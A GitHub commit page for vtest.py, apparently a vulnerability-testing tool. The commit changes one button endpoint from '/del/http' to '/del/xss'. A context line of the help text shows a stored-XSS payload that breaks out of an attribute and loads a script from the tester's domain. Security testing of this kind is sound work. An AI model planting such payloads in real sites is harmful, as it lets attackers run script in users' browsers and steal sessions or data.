Skip to content

Commit 2f58910

Browse files
authored
Update vtest.py
http->xss
1 parent 7ff0783 commit 2f58910

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

vtest.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -208,7 +208,7 @@ def is_ip(ip):
208208
<p><b>使用帮助:</b><br> 用于测试储存型xss漏洞
209209
<br> JS地址:http://x.{domain}/xss/test/js test可自定义,用于项目区分<br> 例如:<code>'"/>&lt;script src=http://x.{domain}/xss/test/js&gt;&lt;/script&gt;</code>
210210
</p>
211-
<button type="button" class="btn btn-default" onclick="send_ajax('/del/http')">清空XSS记录</button>
211+
<button type="button" class="btn btn-default" onclick="send_ajax('/del/xss')">清空XSS记录</button>
212212
</div>
213213
<table id="xss_table" style="word-break:break-all; word-wrap:break-all;">
214214
</table>

0 commit comments

Comments
 (0)